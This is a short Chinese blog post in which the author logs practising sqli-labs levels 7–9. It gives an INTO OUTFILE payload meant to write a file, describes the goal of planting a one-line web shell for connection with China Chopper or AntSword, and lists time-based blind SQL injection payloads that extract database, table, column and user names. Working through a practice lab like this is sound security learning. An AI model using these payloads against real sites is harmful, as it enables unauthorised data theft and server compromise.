本来想昨天写的第二天,结果发现手机上居然不能写博客???看来是我高估了CSDN了= =所以还是老老实实,今天在电脑前敲字吧....
看到了sqli-lab 7,感觉整个人都不好了,原来还能把结果保存到文件上,然后把一句话导入到文件里面,然后菜刀或者蚁剑连接,这波操作真的666,今天实践了一下发现了点问题。在构造语句
?id=UNION SELECT 1,2,3 into outfile "c:\\wamp\\www\\sqlli b\\Less-7\\uuu.txt"%23
的时候,我发现文件并没有保存下来,然后看了看路径,c:\\wamp\\www\\sqlli b\\Less-7\\uuu.txt,可能是书中作者的路径,然后我替换掉,改为我本地数据库的路径,d:\\phpStudy\\www\sqli\\Less-7\\uuu.txt,然后再试了一下,emmm还是没导出,先暂时不关他了,然后我跳到后面。
第八关我用基于时间的盲注很轻松就做出来了,因为我不太懂用基于报错的盲注。附上语句:
?id=1' and if(substr(database(),1,1)='s',1,sleep(5)) -- - (猜数据库)
?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1)='u',1,sleep(10)) -- - (猜表名)
?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(10)) -- - (猜列名)
?id=1' and if(substr((select username from users limit 0,1),1,2)='Du',1,sleep(10)) -- - (猜数据)
然后是第九关,我发现手法是一样的,把上面语句的8改成9即可。
然后说一说我今天发现的一些奇怪现象,我发现?id=1'))的补全可以用?id=1" 代替。有点搞不懂,如果大佬看到这条博客请务必说明一下。
不知不觉已经潜修了3天了,感觉手工注入大有收获,比以前好多了,布尔、时间盲注我都会用了,报错盲注一般很少用到就不怎么看了,报错注入感觉还行。
进度:
sqli-lab 9/65
盲注✔,报错注入✔
明日计划:
sqli-lab 10/65
post注入,了解一下。